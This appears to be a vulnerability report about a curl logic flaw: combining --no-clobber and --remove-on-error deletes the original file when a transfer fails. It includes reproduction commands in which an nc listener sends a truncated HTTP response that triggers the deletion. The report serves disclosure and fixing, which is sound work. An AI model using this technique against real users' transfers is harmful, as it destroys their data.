Curl command has a logic flaw that results in removal of a wrong file when combining --no-clobber
and --remove-on-error
if the target file name exists and an error occurs.
echo "important file" > foo
echo -ne "HTTP/1.1 200 OK\r\nContent-Length: 666\r\n\r\nHello\n" | nc -l -p 9999
curl -m 3 --no-clobber --remove-on-error --output foo http://testserver.tld:9999/
ls -l foo*
cat foo.1
-m 3
is used here to simulate a denial of service of the connection performed by the attacker.
The bug appears to happen because the remote-on-error unlink
is called without considering the no-clobber generated file name:
Removal of a file that was supposed not to be overwritten (data loss). Incomplete file left of disk when it should have been removed. This can lead to potential loss of integrity or availability.
For this attack to work the attacker of course would need to know a scenario where the victim is performing curl operation with --no-clobber
--remove-on-error
options.